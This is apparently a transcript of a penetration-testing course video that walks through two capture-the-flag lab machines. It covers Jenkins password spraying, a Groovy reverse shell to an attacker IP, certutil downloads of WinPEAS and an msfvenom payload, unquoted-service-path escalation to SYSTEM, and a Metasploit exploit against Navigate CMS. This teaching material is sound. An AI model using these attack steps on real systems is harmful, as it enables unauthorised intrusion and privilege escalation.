Jenkins. How about password with a capital P? Jenkins with a capital J. Okay. Something like password 1, etc. Now we have 3 different users, 5 different passwords, 15 different attacks. 3 times 5 is 15. So we're going to try admin first with all these passwords. Then it's going to go through and try administrator with all these passwords. Then it's going to try Jenkins with all these passwords. Okay, so we're going to hit start attack. And what's going to happen is it's going to start pushing through. And we have to be very cognizant and watch this and watch for any sort of changes that might happen in this. Okay, it's very, very subtle. Okay, when we're looking through this, if there's a status change, sometimes these will go like 401. Or we could follow the redirection in the settings, by the way. We could select that. There's also advanced stuff that we'll get into with, like, we can use grep to look for different changes in here. We'll talk about that a little bit later, but we also cover that in the external pen test playbook course because that is something that we do when we're doing password spraying attacks. Here in this instance, we are looking for subtle changes like the length that is here. If you notice, everything's 302, so there's no difference in status changes. There's no difference in like error codes or anything. What we're seeing though is 318, 318, 318, 318. All of a sudden there's a 314 on Jenkins. What changes here? What is the response that changes compared to this? Okay, here we get a J session ID cookie, where here before we did not have that. Here we get a cookie, and then what changes? Here we already have a J session ID cookie, and we're getting a login error because we have more data that we're storing in here. We're already authenticated. So now it's gone from 318 down to 314 for this one request into a bunch of 408s to 409 range. So this one small tiny little request here, this little length difference, could be the indicator that there's something different. So you have to really scroll through this, use your eagle eyes, and make sure that you are looking through this with a fine-tooth comb. Here, I am seeing Jenkins as a valid login, and we're going to go attempt that. I'm going to turn this off. We're going to go attempt to log in with Jenkins. And hopefully we get in. Okay, we do get in. So from here, we do have the ability to run code execution. Let's see what they say. So we need to find a place to execute this code. This is okay. I've seen better write-ups on this. So going around and doing some research, you will find places to execute code in here. If you go into Manage Jenkins, there should be a bunch of different tools that are in here. Scrolling through, there is a command line here that you can run from a shell, which seems pretty interesting. It's just getting into a shell on this machine from a script. There's also a script console here. Okay, the script console is interesting because it's in Groovy. We've seen Groovy a few times. You might even type something like Jenkins script console exploit, something like that. And you can see exploiting Jenkins Groovy script console in multiple ways. So this is somebody that came in here and did this. Another thing that you can just read through and see, they're using Metasploit. We can use manual methodology, which is right here. There's a GitHub reverse shell, which honestly, if you just go to Google and you just type in Groovy reverse shell, the first thing that comes up should be your ideal one, which it looks like that's the same one they had too. But this is what I like to use. You can come in here, make this a little bit bigger. You can just go raw, copy this, and then we'll paste it and we'll talk about it. So copy that, paste it in here. So we need to utilize this for a reverse shell. This is using command.exe to perform the reverse shell. It's giving the port of 8044. You can choose whatever port you want here, but I'm going to keep it the same. Why not keep it simple? Okay, so I'm going to make this bigger. Netcat MVLP 8044. We'll set up a listener. On here, we have localhost. We're not running localhost, okay? We're going to give it 192.168.138.131 or whatever your attacker IP is. So whatever your IP of your Kali Linux machine is, this is what you want to get. So this is just a reverse shell. All it is written in is Groovy instead of the other ways that you've seen it so far. So it's going to reach out to us on this port, and when it reaches out to us, it's going to execute command.exe. Here is the whole process of that code. All we have to do is execute this, which I might need to make this a little bit smaller to actually see that. Let's see, we'll just go all the way over to the right, and I'll just run this. Okay, and it's stalling, which is usually a good sign, meaning that we are likely getting in, and we do have a shell here. So we are now, who am I? We are now Butler on Butler. We are not system. We're not authority system. So we need to take this a little bit further and see if we can elevate privileges. Now, there are several tools and methods that we can utilize. We are going to look at a classic form of privilege escalation on this machine. If I were going through this machine, the first thing that I would do is I'd look at system info. I would want to know what machine this is, what the build is. You can see we're running on Windows 10. If this was running on an older edition, this is a Windows 10 Enterprise, which is nice. We're running on Windows 10, so the chances of there being an exploit for this build may be pretty low. I would look at this build, see if there's anything there that we can use or abuse in order to get escalation. But the intended path on this, as of right now, is a different method. So we're going to look through that, and I'm going to show you kind of the basic enumeration process that we can use. Again, if you're curious and seeing this in way more detail, you are welcome to join us in the Windows Privilege Escalation course and go through this a little bit more. So with that out of the way, there is a tool out there called WinPeas. So I'm going to go back. I'm kind of already cheating and going ahead because I downloaded this earlier. But if you search WinPeas, remember LinPeas? This is the Windows version of LinPeas. So just go to the first thing that you see. Now in here, if you scroll down a little bit, they have the different, they'll have different downloads. So we can go into the exe here, WinPeas exe, and you'll see an SLN. We don't want the SLN. We just want to be able to download the latest. So go into download the latest version. We're not going to compile this. We're just going to trust what they've got. So come in here, download WinPeas x64.exe right here. All right, I'll say okay on this because I want to show you again what I do. If you come into root and you open a new tab, make sure you move this. So I don't know if I actually downloaded it. Let's see. WinPeas, I didn't download it, but I moved WinPeas, whatever it's called, WinPeas 64. Make sure you do that. Move that into your transfer folder, or ensure that you're going to have it where you want to host it. I actually just moved it and I renamed it winpeas.exe because it's a lot easier to just type that out on a machine. And so a little bit keeping it simple. So with that, I'm going to go ahead and just do this, which is Python 3-m for module, http.server, and port 80. So we're going to host up this transfer folder. In here, I'm going to go ahead and go to my shell, and I want to go to my user folder or somewhere that I can write. It looks like I'm in the Jenkins folder, but I like to go, first of all, cd c user. Okay. Actually, cd c users. Do a dir in here. Butler should have read access or read write access, so we're going to go there first. What we might do too is see if there's anything in here. Like we might look at like he's got some downloads in the downloads folder, it looks like. An indicator in here is looking at the different times. Sometimes when you're doing these CTF machines, like what was the last time this is updated? So there might be something in the downloads folder that could be of interest, like CD downloads. Go dir real quick. Looks like WiseCare 365 was installed. Who knows what that is? That could be something of value to us later, but that is not... That is information. It's just not exactly what we're looking for at this exact second. We can go around, maybe CD to the desktop, see if there's anything there. Nothing there either. Okay. So we just want to be able to put a file somewhere that's writable. So I'm going to put WinPeas here in Butler's folder, just his base folder here for his user. And all we're going to do is use a tool called certutil to transfer this over. So certutil.exe, we're going to do a dash URL cache like this, dash F for file, and then we're going to grab the 192.168.138.131/WinPeas. We're going to call it WinPeas. Okay, we should do a dir, and it should exist right here. So if you need a second to catch up, go ahead and catch up. Otherwise, we're going to go ahead and move on. So now we just run winpeas.exe. And special note, yours might not be in color. You can run this reg add command, or should be able to run this. I'm not sure as a lower level user actually. So you might have to suffer through the first time with seeing it not in color, but just follow along on my screen if you can't run this reg add, but you're gonna have to run this and then run this again. Otherwise, we're just gonna kind of scroll through this and see. This is similar to what we saw with linpeas. Red means something we want to look at and kind of scroll through, okay? So we're just going to scroll through this. There's a lot of output on this machine. I'm looking for anything that quickly stands out for me. These protection enabled, they really don't matter to me at this moment. I'm looking for something that might just like, hey, this immediately stands out. So it's giving us drive information. Most of this is just disk enumeration at this point. Nothing of value so far. It's looking up printers, tells printers, is looking up named pipes, which is fine. Going through, this is telling us explicit credential events, which these are plain text credentials if we have them. I'm not seeing anything here. So we'll scroll through these, keep going. Printing account logon events, these are just events again. So WinPeas has gotten beefier over the years. It used to be pretty quick to scroll through. I'm going to actually cheat a little bit and scroll down. PowerShell script blocks. Let's keep going here. Okay, users information. It's telling us the users on this machine. And again, this is all different kinds of enumeration. Now, the SE impersonate privilege could be good for a potato attack, but that's a different type of attack. We're not looking for that at the moment. But that could be something, that's why it's highlighted in red, something we do cover in the escalation course. So it's telling us more about user accounts that are on this machine, any sort of RDP sessions that might exist, any sort of folders. Heavy, heavy, heavy enumeration to scroll through. Okay, we're in process information. I'm going to skip past processes. I'm not too concerned about what processes are running. That could take a long time to scroll through. When we're doing privilege escalation, we are looking for quick wins. So we got some service information. And in here, there are some, okay, something does show up, and this is all lighting up red. So I'm looking and reading through here. We have the ability to modify services. Like we have the ability to modify Jenkins.exe. Perhaps we can modify that and write a shell code here and get a shell since we're running as this user. But I'm not sure that that's going to run as administrator. It looks like file permissions here. We would have to be able to hijack that binary. So I'm going to scroll through. Again, this is disabled. We might be able to enable this. VMware, I don't ever attack. I don't know if that's really truly an attack method, even though it shows up a lot. The other one that showed up that's interesting is here. We have this Wise Boot Assistant, which was that WiseCare that we saw downloaded. So that's of interest because we did see that downloaded. We do see this running. And what's weird is, okay, it's running, it's auto running, and it says no quotes and space detected. It said you can modify this service, all access, file permission is run as administrator. That's very, very interesting. So let's talk about what we're seeing. And I know this could be a little bit overwhelming because this is just kind of throwing privilege escalation in your face from a Windows perspective. And that can get pretty messy pretty quick depending on what you're looking for. What we're looking at here and why this is important is we are looking at a privilege escalation that will allow us to get system on this machine. And this is called unquoted service paths. I'm going to show you what this looks like on the Windows machine. But basically what's happening is the service executable that is here, the service executable, it is located in a path that is not enclosed in quotes. Okay, so you see no quotes, and there's a space detected. So you see a space, you see a space. Okay, the issue here is that when we're running this, when Windows runs this and it looks for this service, when you start the service up, it's literally looking for every instance that exists before the space and it's trying to add .exe. So it first tries cprogram.exe, then cprogramfiles.exe. Okay, it keeps going on. Here, cwise.exe or wise/wise.exe, wisecare.exe. Okay, and what's happening is, I think my machine might have just shut down on me. I'm going to go ahead and turn this back on, as I was going to show you. What's happening is we can take an executable, malicious executable, basically malware, and we can upload it to this machine, place it in one of these folders. We don't have to overwrite this, by the way, not the boottime.exe. We can literally just write something called wise.exe. As long as we have permission to write into this folder, we can do that, and then we can run it, and hopefully we can get a shell out of that, because the system is going down and it's looking for wise.exe, and when it finds it, it will run that first, and then we're going to attack it based on this. So I want to show you really quick on the Windows side of the things. Of course, I am locked out of the administrator account as well. Okay, so what I've done in here is I've gone out and I've looked for this service in the reg edit. You don't have to follow along, but this is an HKey local machine system, current control set, services, and then the wise boot assistant. When we say unquoted service path, if we look at this image path here, there should be, to prevent this attack from happening, quotes around this. There are not quotes around this. So this is called an unquoted service path, meaning we're not taking the literal path of this. Thus, when we run C program files x86 wise all the way through for this boot time, it's going to do those checks. Now, I don't know if we have write permissions to the C program files folder as a user, but we certainly should have write permissions here since we installed this, it looks like, as the user. So if we have write permissions to this wise folder, we can go ahead and just drop a file in there called wise.exe, and it will try to run wise.exe in that folder. Okay, so it'll go C program files, wise.exe. It's going to exploit this situation here, and hopefully we will get a shell out of this. So let's go ahead and give this a try. What I'm going to do is I'm going to scroll all the way down here and look at all this mess. There's a lot. Now, there are other tools that could easily identify this, by the way. Like, this tool is probably the most comprehensive, and that's why I showed it to you. But there are tools called PowerUp, which will do this. There are exploit checkers that will do this. There are other ways to run through machines like this and do escalation checks. I'm showing you the most probably popular tool, but it is the most comprehensive and it can be overwhelming. So please don't feel overwhelmed. You will, with practice and over time, learn how to decipher this, read through it really fast, and know kind of what you're looking for, train your eyes for those things. Again, this is just introductory, ground level type stuff. So what we want to do is we want to generate some malware. I'm going to go ahead and stop sharing this folder real quick because I'm going to put malware into this. So we're going to use MSF Venom, and we're going to use this to generate some shellcode here. Okay, so we're going to do a payload of Windows x64. We're going to do a shell reverse TCP. And if you wanted to do this with Metasploit, you could do like Meterpreter, go down that path, etc. For this instance, we're going to use no Metasploit. We're just going to do this all manually. We're going to give our listening host, which is us, 192.168.138.131. This is your attacker machine. We're going to give a listening port. I'm going to call this 7777. Do a file type of executable and an output of wise.exe. You could also do this as wise.exe, just like that. All right. So we're going to go drop this once it generates into the wise folder. So I'm going to go ahead and put this back up as a transfer. So my transfer folder is back up and running. I'm also going to open a new tab, and I'm going to netcat nvlp, and we're going to listen on all 7s because that's where we said that this is going to work. So we know this is 64-bit architecture. We saw that, by the way, when we were running system info. We saw that this is Windows 10, 64-bit architecture. So this is all from our little bit of enumeration that we did. Going back to this machine, we need to go ahead and get into that folder. So that folder was in C. So we're going to cd C, and we're going to go ahead and do a quick dir. And it's easier for me to just copy like this and then do a cd paste like that. Get you in there, cd into Wise. Okay, and now we're in the folder that we want to be in. So if we type in dir, we got WiseCare 365. So we're going to put Wise in here. It's going to try to run wise.exe, and we should be good to go. So we'll see how this works. What we need to do is run cert util one more time. Same way, we're going to use this to transfer a file over, which is nice. HTTP, just like this, 192.168.138.131/wise.exe. And we're going to call this wise.exe, just like that. Hopefully it comes over. Do a dir. Okay, it's sitting in here. That's great. Now, the question is, how do we run this? If we just do a ./ or if we just go wise.exe, don't hit enter. If we do wise.exe, that is going to run this as the regular user. It's going to run it as Butler. You will pop a shell back here as Butler, and we will have gain no ground whatsoever. So what we need to do is we need to stop the service that's running. Now, the service that's running is the Wise Boot Assistant. Okay, we can query that to find that out. I'm just telling you how to do it just a little bit easier. You can go Google what the running service is called. You could look through WinPs and it'll tell you as well. I'm just guiding you along, giving you a quick step ahead here. So we're going to do a service stop on Wise Boot Assistant. It's all one word like this. Okay. Okay, so it's saying stop pending. It's going to go ahead and stop that. We can do, I believe, sc query of Wise Boot Assistant. Okay, and you can see that this is stopped. So now that it's stopped, what we're going to do is we're going to start it. When we start it, it's going to execute as the system. It's going to run that shell code as system, and hopefully we get a shell back as system. So you see the shell came through. We say, who am I? Authority system. And that is it. So this is a very, very classic, absolutely classic way of exploiting a machine. So looking through the printout of WinPs, again, there are other tools out there that do this. There's actually even a check that will do this from a one-liner. There are privilege escalation checklists and guides that you can go through. So when you get on a machine, you say, hey, I'm going to check this first, then I'm going to check this next. And you go through the checklist and make sure you leave no stone unturned. You kind of get your low-hanging fruit like you saw with the Linux. Like, we'll check history first because maybe there's a password stored in history. Then we'll check sudo and see if we have any privileges and kind of go down the easy list. Same thing with system info. I want to see what the build is. If I can recognize the build, there's something there from trained eyes. And then kind of just go down the list as to what we need to do. Running WinPs is something that we can execute fairly easy, run through it. Same thing with PowerUp or other tools like that. And we can go through and find issues like this. And this one is a classic. If you do any CTF machines, I guarantee you will see this in the future. So this is a good one to show you as an example and build you up into privilege escalation and get your feet wet in the game. So that's it for this machine. We're going to go ahead and move on to the next one. Welcome to this box titled Black Pearl. This box was created by Alec and is a Linux machine. Thank you, Alec, for creating this machine. We're going to go ahead and start off with our nmap scan. as always, if you haven't found your IP address, go do that. Get your Nmap scan going. If you just want to follow and watch along and continue from here, that's fine too. Now, our Nmap scan only shows us here with port 22, DNS 53, and port 80. As discussed in the past, 22 likely not the option, so that really leaves us with 80 because 53 is likely not the option either, though it does come into play a little bit. Now we can see we have a default web page here just by looking at the title, this Nginx. We have a welcome to Nginx, meaning if we go out to this website, we go 192.168.138.130, and I turn off my proxy and refresh, we get a welcome to Nginx page. So what do we need to do? We probably need to fuzz this and see where we can get with this information. So we're going to do a quick fuzz on this. Something else that's, I think, hidden in here. Let me view the page source. It always helps to define the page source. In here, you can see that there has been a little nice thing added in where it says alec@blackpearl.tcm. So that's your webmaster. Let me make it a little bit bigger. alec@blackpearl.tcm. This is a big hint giveaway, something we haven't covered quite yet. And we're just going to keep that in the back of our mind. But we know that we need to access this web page. We're going to go ahead and try to do some directory busting first and see if we can't get there with that. So let's go ahead and take a look at the directory busting, and then we'll go from there. So new tab, we're going to do do -w user share word list. This should be starting to feel a little bit familiar, right? dir buster for me, and then just tab through to get to the medium list, and then go ahead and say fuzz, and then we're just going to do -u with the IP address. For me, it's 130/fuzz. Run that and see if we can't find anything. And immediately we get something called secret. So let's go ahead and go over to /secret. It's a file. Let's go ahead and save that. Let's open the containing folder, and let's just open this if we can. Open up with mousepad. And it said, oh my god, you got root. Just kidding, search somewhere else. Directory busting won't give anything. This message is here so that you don't waste time directory busting this particular website. Alec. Okay, so what he's telling us is you're not going to find anything on this directory. Well, we're likely not going to find anything hunting down port 22. We're likely, I mean, we could attack maybe Alec at 22 with some weak passwords and see what we find. But that's not the entry port. And here we have 53, which means that this is running DNS, and it's running DNS for a reason. So we're going to do some recon on this. What we're going to do is we're going to just say, and I'm actually going to run it over here. We're just going to use a tool called DNS recon, and we're going to say -r, and that is for our range of 127.0.0.0/24. We're just scanning the local host because that's where our machine is. And then we're going to provide the IP address of the box that we're actually looking for, which is 130. And then for D, you can literally type in whatever you want. We can just type in blah. D is just needed there for a dictionary, but we're not going to use it, and it's still going to be able to find it. If we take it out, it won't work, which I'll show you. Or D for domain, I'm sorry, not dictionary. D for domain. We're providing a domain, but it's going to look for that domain, but if we don't provide it, it won't search. So it requires the domain. Even though we don't have the domain or don't know the domain, it's still able to find it. So what it found was 127.0.0.1 which means that there's DNS pointer record here to this web page. We need to go ahead and add that to our DNS in Etsy hosts. Okay, so what we can do is just nano Etsy hosts. And in here, you can see that we have our 127.0.0.1 for localhost and 127.0.1.1 for Cali. We need to add in the IP address, 168.138.130. We're just creating a DNS record here for blackpearl.tcm. So now we're going to say, hey, blackpearl.tcm allocates to this IP address, and the DNS is going to do its magic. So we're going to Control X, hit Y, hit enter, and then in your web browser, go ahead and close it completely if you had one open, and then we're going to go back, open it up, and hopefully this will work. First go. So http://blackpearl.tcm. Okay, and if this happened correctly, you should see this page. Okay, if for some reason it did not load for you, go ahead, go back, close this out again, give it a second, let it repopulate. So here we are brought to this My Info page. Now we have seen this before, and again, we can get some information disclosure here. We can see that we're up against a Linux box. We can see the name of the box, Debian, system type. There might be some sort of execution we can run against this. But again, when we're up against a directory like this, we want to do some directory brute forcing and see if maybe we can get access to this machine or get access any further than what we are. So we're just going to want to fuzz the directory one more time and see if that leads to anything. As of right now, this info page is giving us info, yes, but there might be more hiding under the covers. So we're going to go ahead and go back, and we're going to just use fuff one more time. User share wordless, and I'm never going to get tired of saying that. Dirbuster, if I can type and then do my tabby thing. All right, so we're going to fuzz here. And then this time around, we're going to do a -u, and we're going to do blackpearl.tcm, not the IP address, blackpearl, and we're going to say fuzz, okay? And we're going to let this go through. We're going to look for anything that might show up, and immediately navigate shows up for us. So that's interesting. Let's go ahead and just navigate to navigate, shall we? Okay, we've got Navigate CMS version 2.8, copyright 2021. And we're going to go ahead and just dig a little bit further into this. So my go-to is always Google. Just, hey, Navigate CMS. We could look for exploit. We could also look for default credentials if there are any, see if we can go in there. But look at this. We've got unauthenticated remote code execution from exploit database. We can run it manually, or we can run it with Metasploit. So that's nice. We have options. So actually an exploit database is with Metasploit as well. I'm sure there is manual code out there, but for this one, since we haven't run Metasploit really much in the capstone, we're going to go ahead and mix it up and use a little bit of Metasploit here. Otherwise, I encourage you to go back and try this manually as well. But we're going to go ahead and open up Metasploit and see what it's got to offer for us. So MSF console. Let this load real quick, and this gives us the module in here. I mean, we could search for it, but it's easier to just honestly just copy this, and we should probably verify. Okay, so this is tested against Navigate CMS 2.8. This module exploits insufficient sanitization in the database protect method and allows us to bypass authentication. The module then uses path traversal vulnerability that allows authenticated users to upload PHP files. Together we can get remote code execution. So it's chaining attacks here. First it's going and it's bypassing authentication. It's then uploading malware, which uses a path traversal vulnerability to do that via the authenticated user, and then uses that to do remote code execution. So this is a chained attack here. This is pretty unique. So we're going to go ahead and go in here and just paste. Hopefully this works. This is Metasploit 6 I'm on. And it does. Okay, so when we're